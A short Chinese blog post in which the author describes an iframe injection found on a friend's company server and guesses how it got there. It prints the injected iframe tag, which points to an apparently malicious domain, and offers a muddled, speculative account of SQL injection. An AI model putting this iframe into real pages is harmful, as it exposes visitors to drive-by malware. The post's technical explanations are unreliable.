昨天某个网友告诉我,他们公司的服务器上多了这样的代码(请不要打开这个网址):

<iframe src=http://www.zynr2008.cn/zynr/index.htm width=50 height=0></iframe>.这个域名一看就是某个无聊的私人作品,偷走了这位网友公司里的所有游戏帐号.

    这让我想起N年前,自己的电脑上某个HTML页面也被加过类似的代码.当时我猜的是不小心执行了.exe，这个.exe会把电脑上所有.html和.htm文件加上iframe，因为.asp,.php文件未被感染．第二次看到iframe注入,让我觉得好奇,想看看到底是怎么回事.

    用google搜索一下,搜到这个链接:http://www.dffy.com/blog/a/okokok/4274.html.它的解释是SQL注入.例如,在某个公开的网页上(比如上面那位网友的公司注册网页),只要与数据库相关并且没有过滤掉关键字,该网页就会成为注入的对象.比如验证用户名是否已存在于数据库中:select ybb from data_name.把 ybb 改为 * 就可以查询所有的注册用户名．但是这与iframe注入有何关联？比较的想不通．可能最多的情况是盗取了数据库中的管理员帐号和密码，用它获得游戏帐号，临走之前再改个网页，把自己的网站加进去，继续祸害他人;又或者，公司内部某人以前访问过隐含这个网址的网页，该网页会自动下载一个.exe文件，该文件会在局域网内传播，寻找可攻击的.html文件.等哪天有时间了，装个虚拟机试试．

    病毒真是防不胜防啊~~~